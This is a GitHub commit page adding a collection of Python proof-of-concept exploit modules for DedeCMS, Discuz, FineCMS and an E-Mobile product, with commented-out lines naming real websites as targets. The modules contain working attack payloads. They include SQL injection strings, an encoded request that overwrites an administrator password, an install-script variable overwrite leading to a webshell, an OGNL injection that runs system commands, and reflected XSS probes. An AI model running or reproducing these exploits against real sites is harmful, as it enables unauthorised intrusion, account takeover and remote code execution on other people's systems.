-
Notifications
You must be signed in to change notification settings - Fork 26
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
LoidAir
authored and
LoidAir
committed
Nov 25, 2018
0 parents
commit 1db5cb5
Showing
132 changed files
with
861 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1 @@ | ||
| # cms_poc_exp |
Empty file.
Empty file.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,10 @@ | ||
| # coding:utf-8 | ||
| import requests | ||
|
|
||
| class Exploit: | ||
|
|
||
| def attack(self, url): | ||
| target = url + "/dede/login.php" | ||
| req = requests.get(target, timeout=5) | ||
| if req.status_code == 200 and "/include/vdimgck.php" in req.content: | ||
| return "后台地址 {}".format(target) |
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,32 @@ | ||
| #!/usr/bin/env python | ||
| # -*- coding: utf-8 -*- | ||
| #__author__ = 'ifk' | ||
| #Refer http://www.expku.com/web/4955.html | ||
| #http://118.126.10.60/base-v57/是官网上的demodata不会消失 | ||
| import requests | ||
|
|
||
| def assign(service, arg): | ||
| if service == "dedecms": | ||
| return True, arg | ||
|
|
||
| def audit(arg): | ||
| url='/install/index.php' | ||
| payload1='?step=11&insLockfile=utf-8&s_lang=urf-8&install_demo_name=../data/admin/config_update.php' | ||
| payload2='?step=11&insLockfile=utf-8&s_lang=utf-8&install_demo_name=testvul.php&updateHost=http://118.126.10.60/base-v57/' | ||
| testvul='/install/testvul.php' | ||
| req = requests.get(arg+url+payload1, timeout=5) | ||
| if req.status_code == 200 and '远程获取失败' in req.content: | ||
| req2 = requests.get(arg+url+payload2, timeout=5) | ||
| if req2.status_code == 200 and '存在(您可以选择安装进行体验)' in req2.content: | ||
| req3 = requests.get(arg+testvul, timeout=5) | ||
| if req3.status_code == 200 and 'INSERT INTO' in req3.content: | ||
| return '[CVE-2015-4553]Dedecms variable coverage leads to getshell ' + arg + url | ||
|
|
||
| # if __name__ == '__main__': | ||
| # from dummy import * | ||
| # audit(assign('dedecms', 'http://localhost:8080/DedeCMS-V5.7-UTF8-SP1-Full/uploads/')[1]) | ||
|
|
||
| class Exploit(object): | ||
|
|
||
| def attack(self, url): | ||
| return audit(url) |
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,19 @@ | ||
| #!/usr/bin/env python | ||
| # -*- coding: utf-8 -*- | ||
| # DedeCms data/mysql_error_trace.inc 敏感信息泄露 | ||
| import requests | ||
|
|
||
| def audit(arg): | ||
| url = arg + '/data/mysql_error_trace.inc' | ||
| req = requests.get(url, timeout=5) | ||
| if "<?php exit();" in req.text: | ||
| return url | ||
|
|
||
| class Exploit(object): | ||
|
|
||
| def attack(self, url): | ||
| return audit(url) | ||
|
|
||
| # if __name__ == '__main__': | ||
| # from dummy import * | ||
| # audit(assign('dedecms', 'http://www.9ifd.com/')[1]) |
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,21 @@ | ||
| #!/usr/bin/env python | ||
| import re | ||
| import requests | ||
|
|
||
| def assign(service, arg): | ||
| if service == "dedecms": | ||
| return True, arg | ||
|
|
||
| def audit(arg): | ||
| url = arg | ||
| req = requests.get(url + '/data/mysqli_error_trace.inc', timeout=5) | ||
| if req.status_code == 200 and 'exit();' in req.content: | ||
| return 'dedecms error info:' + url + '/data/mysqli_error_trace.inc' | ||
| # if __name__ == '__main__': | ||
| # from dummy import * | ||
| # audit(assign('dedecms', 'http://localhost:66/dede')[1]) | ||
|
|
||
| class Exploit(object): | ||
|
|
||
| def attack(self, url): | ||
| return audit(url) |
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,54 @@ | ||
| #!/usr/bin/env python | ||
| # -*- coding: utf-8 -*- | ||
| #__author__ = 'Ario' | ||
| import re | ||
| import requests | ||
|
|
||
| def assign(service, arg): | ||
| if service == "dedecms": | ||
| return True, arg | ||
|
|
||
| def audit(arg): | ||
| url = arg | ||
| response = requests.get(url + '/data/admin/ver.txt', timeout=5) | ||
| if response.status_code == 200: | ||
| m = re.search('^(\d+)$', response.text) | ||
| if m: | ||
| return 'TimeStamp: %s, Possible Version: %s' % (m.group(1), check_ver(m.group(1))) | ||
|
|
||
| def check_ver(arg): | ||
| ver_histroy = {'20080307': 'v3 or v4 or v5', | ||
| '20080324': 'v5 above', | ||
| '20080807': '5.1 or 5.2', | ||
| '20081009': 'v5.1sp', | ||
| '20081218': '5.1sp', | ||
| '20090810': '5.5', | ||
| '20090912': '5.5', | ||
| '20100803': '5.6', | ||
| '20101021': '5.3', | ||
| '20111111': 'v5.7 or v5.6 or v5.5', | ||
| '20111205': '5.7.18', | ||
| '20111209': '5.6', | ||
| '20120430': '5.7SP or 5.7 or 5.6', | ||
| '20120621': '5.7SP1 or 5.7 or 5.6', | ||
| '20120709': '5.6', | ||
| '20121030': '5.7SP1 or 5.7', | ||
| '20121107': '5.7', | ||
| '20130608': 'V5.6-Final', | ||
| '20130922': 'V5.7SP1'} | ||
| ver_list = sorted(list(ver_histroy.keys())) | ||
| ver_list.append(arg) | ||
| sorted_ver_list=sorted(ver_list) | ||
| return ver_histroy[ver_list[sorted_ver_list.index(arg) - 1]] | ||
|
|
||
|
|
||
| class Exploit(object): | ||
|
|
||
| def attack(self, url): | ||
| return audit(url) | ||
|
|
||
|
|
||
| # if __name__ == '__main__': | ||
| # from dummy import * | ||
| # audit(assign('dedecms', 'http://www.ceowo.com/')[1]) | ||
|
|
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,17 @@ | ||
| #!/usr/bin/env python | ||
| # -*- coding: utf-8 -*- | ||
| #__author__ = 'Ario' | ||
| #SSV-ID: 61188 | ||
| import requests | ||
|
|
||
| def audit(arg): | ||
| url = arg + "/plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3D" | ||
| response = requests.get(url, timeout=5) | ||
| if response.status_code and "http://www.baidu.com" in response.text: | ||
| return url | ||
|
|
||
|
|
||
| class Exploit(object): | ||
|
|
||
| def attack(self, url): | ||
| return audit(url) |
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,37 @@ | ||
| #!/usr/bin/env python | ||
| # -*- coding: utf-8 -*- | ||
| #__Author__ = 烽火戏诸侯 | ||
| #_PlugName_ = dedecms 修改任意管理员漏洞 | ||
| import requests | ||
|
|
||
| def assign(service, arg): | ||
| if service == "dedecms": | ||
| return True, arg | ||
|
|
||
| def audit(arg): | ||
| payload = '/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95'\ | ||
| '&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120'\ | ||
| '&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69'\ | ||
| '&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105'\ | ||
| '&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100'\ | ||
| '&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100'\ | ||
| '&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97'\ | ||
| '&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51'\ | ||
| '&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39'\ | ||
| '&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105'\ | ||
| '&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35' | ||
|
|
||
| target = arg + payload | ||
| req = requests.get(target, timeout=5) | ||
|
|
||
| if req.status_code == 200 and 'Safe Alert: Request Error step 2!' in req.text: | ||
| return 'spider:admin:'+target | ||
|
|
||
|
|
||
| # if __name__ == '__main__': | ||
| # from dummy import * | ||
| # audit(assign('dedecms', 'http://healthworkshop.com.hk/')[1]) | ||
|
|
||
| class Exploit(object): | ||
| def attack(self, url): | ||
| return audit(url) |
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,36 @@ | ||
| #!/usr/bin/env python | ||
| # -*- coding: utf-8 -*- | ||
| #__author__ = 'ifk' | ||
| #Refer http://www.shangxueba.com/jingyan/2190419.html | ||
| import re | ||
| import requests | ||
|
|
||
| def assign(service, arg): | ||
| if service == "dedecms": | ||
| return True, arg | ||
|
|
||
| def audit(arg): | ||
| url = '/plus/guestbook.php' | ||
| req = requests.get(arg + url, timeout=5) | ||
| if req.status_code == 200: | ||
| m = re.search(r'admin&id=(\d+)', req.text) | ||
| if m: | ||
| a = m.group(1) | ||
| payload1 = '/plus/guestbook.php?action=admin&job=editok&id=' | ||
| payload2 = "&msg=%27,msg=md5(3.14),email=%27" | ||
| payload = payload1 + a + payload2 | ||
| verify_url = arg + payload | ||
| requests.get(verify_url, timeout=5) | ||
| req2 = requests.get(arg+url) | ||
| if req2.status_code == 200 and '4beed3b9c4a886067de0e3a094246f78' in req2.text: | ||
| return 'dedecms5.7 guestbook SQLinjection on %s' % url | ||
|
|
||
| # if __name__ == '__main__': | ||
| # from dummy import * | ||
| # audit(assign('dedecms', 'http://www.jxsrmyy.cn/')[1]) | ||
|
|
||
|
|
||
| class Exploit(object): | ||
|
|
||
| def attack(self, url): | ||
| return audit(url) |
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,24 @@ | ||
| #!/usr/bin/env python | ||
| # -*- coding: utf-8 -*- | ||
| #__author__ = 'Ario' | ||
| import requests | ||
|
|
||
| def assign(service, arg): | ||
| if service == "dedecms": | ||
| return True, arg | ||
|
|
||
| def audit(arg): | ||
| url = arg | ||
| req = requests.get(url + '/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa%5c%27and+char(@`%27`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,md5(0x40776562736166657363616E40),5,6,7,8,9%20from%20`%23@__admin`%23', timeout=5) | ||
| if req.status_code and "2e0e20673083dea5cc87a85d54022049" in req.text: | ||
| return url | ||
|
|
||
| # if __name__ == '__main__': | ||
| # from dummy import * | ||
| # audit(assign('dedecms', 'http://www.example.com/')[1]) | ||
|
|
||
|
|
||
| class Exploit(object): | ||
|
|
||
| def attack(self, url): | ||
| return audit(url) |
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,32 @@ | ||
| #!/usr/bin/env python | ||
| # -*- coding: utf-8 -*- | ||
| #__author__ = 'boy' | ||
| import requests | ||
|
|
||
| def assign(service, arg): | ||
| if service == "dedecms": | ||
| return True, arg | ||
|
|
||
| def audit(arg): | ||
| url = arg | ||
| req = requests.get(url + '/plus/search.php?keyword=as&typeArr[uNion]=a', timeout=5) | ||
| if req.status_code == 200: | ||
| if "Safe Alert: Request Error step 1" in req.text: | ||
| payload = "/plus/search.php?keyword=as&typeArr%5B111%3D@%60%5c%27%60%29+and+%28SELECT+1+FROM+%28select+count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select+md5%281%29%29,1,62%29%29%29a+from+information_schema.tables+group+by+a%29b%29%23@%60%5c%27%60+%5D=a"; | ||
| req2 = requests.get(url+payload, timeout=5) | ||
| if req2.status_code == 200 and '1c4ca4238a0b923820dcc509a6f75849b' in req2.text: | ||
| return "plus/search.php sqlinject: "+payload | ||
| if 'Safe Alert: Request Error step 2' in req.text: | ||
| payload="/plus%2fsearch.php%3Fkeyword%3Das%26typeArr%5B111%253D@%60%5C%27%60%29%2bUnIon%2bseleCt%2b1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2Cuserid%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2Cmd5(1)%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36%2C37%2C38%2C39%2C40%2C41%2C42%2bfrom%2b%60%2523@__admin%60%2523@%60%5C%27%60%2b%5D%3Da" | ||
| req2 = requests.get(url + payload, timeout=5) | ||
| if req2.status_code == 200 and '1c4ca4238a0b923820dcc509a6f75849b' in req2.text: | ||
| return "/plus/search.php sqlinject: "+payload | ||
| # if __name__ == '__main__': | ||
| # from dummy import * | ||
| # audit(assign('dedecms', 'http://www.hxpp.org.cn/')[1]) | ||
|
|
||
|
|
||
| class Exploit(object): | ||
|
|
||
| def attack(self, url): | ||
| return audit(url) |
Binary file not shown.
Empty file.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,12 @@ | ||
| # coding:utf-8 | ||
| # discuz 爆路径 | ||
| import requests,re | ||
|
|
||
| class Exploit: | ||
|
|
||
| def attack(self,url): | ||
| req = requests.get(url+'/api.php?mod[]=Seay') | ||
| if req.status_code == 200: | ||
| m = re.search(r'<b>Warning</b>:[^\r\n]+or an integer in <b>([^<]+)api\.php</b> on line <b>(\d+)</b>', req.text) | ||
| if m: | ||
| return m.group(1) |
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,12 @@ | ||
| # coding:utf-8 | ||
| # discuz 爆路径 | ||
| import requests,re | ||
|
|
||
| class Exploit: | ||
|
|
||
| def attack(self,url): | ||
| req = requests.get(url+'/uc_server/control/admin/db.php') | ||
| if req.status_code == 200: | ||
| m = re.search(r'not found in [<b>]*([^<]+)[</b>]* on line [<b>]*(\d+)', req.text) | ||
| if m: | ||
| return m.group(1) |
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,15 @@ | ||
| # coding:utf- | ||
| # _PlugName_ = Discuz问卷调查专业版插件注入 | ||
| # _Refer_ = http://0day5.com/archives/3188 | ||
| import requests | ||
|
|
||
| class Exploit: | ||
|
|
||
| def attack(self, url): | ||
| payload = "/plugin.php?id=nds_up_ques:nds_ques_viewanswer&srchtxt=1&orderby=dateline%20and%201=(updatexml(1,concat(0x27,MD5(1)),1))--" | ||
| verify_url = url + payload | ||
|
|
||
| response = requests.get(verify_url) | ||
|
|
||
| if response.status_code == 200 and "c4ca4238a0b923820dcc509a6f75849" in response.text: | ||
| return "{} has SQL Injection".format(verify_url) |
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,26 @@ | ||
| # coding:utf-8 | ||
| #_PlugName_ = Disucz X3.2 多处反射型XSS漏洞 | ||
|
|
||
| import requests | ||
|
|
||
| class Exploit: | ||
|
|
||
| def attack(self, url): | ||
| retList = [] | ||
| payload0 = "/member.php?mod=logging&action=login&referer=javascript://www.discuz.net/testvul" | ||
| payload1 = "/connect.php?receive=yes&mod=login&op=callback&referer=javascript://www.discuz.net/testvul" | ||
| verify_url = url + payload0 | ||
| verify_url2 = url + payload1 | ||
|
|
||
| response = requests.get(verify_url) | ||
| response2 = requests.get(verify_url2) | ||
|
|
||
| if response.status_code == 200 and "javascript://www.discuz.net/testvul" in response.text: | ||
| retList.append(verify_url) | ||
| if response2.status_code == 200 and "javascript://www.discuz.net/testvul" in response2.text: | ||
| retList.append(verify_url2) | ||
|
|
||
| if retList: | ||
| return "Discuz X3.2 XSS in {}".format("\n".join(retList)) | ||
|
|
||
| # print Exploit().attack("http://www.julihun.com") |
Binary file not shown.
Empty file.
Binary file not shown.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,23 @@ | ||
| # coding:utf-8 | ||
| import requests | ||
|
|
||
|
|
||
| class Exploit: | ||
|
|
||
| payload = {"message": '(#[email protected]@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()))).(#w.close())', "cmd": "whoami"} | ||
|
|
||
| def attack(self, url): | ||
| response = requests.get(url, allow_redirects=False, cookies={"Cookie": "JSESSIONID=abczr1o15WhAahH88KK6v"}) | ||
|
|
||
| if response.status_code == 302: | ||
| reqUrl = response.headers['Location'] | ||
|
|
||
| if reqUrl: | ||
| retResponse = requests.post(reqUrl, data=self.payload,).text | ||
|
|
||
| if len(retResponse) <= 200: | ||
| return "{} has E-Mobile Expression Injection".format(reqUrl) | ||
|
|
||
|
|
||
| # 'http://113.140.70.190:161' | ||
| # print Exploit().attack() |
Binary file not shown.
Empty file.
Binary file not shown.
Binary file added
BIN
+975 Bytes
finecms/__pycache__/finecms_getshell_ofc_upload_image.cpython-37.pyc
Binary file not shown.
Oops, something went wrong.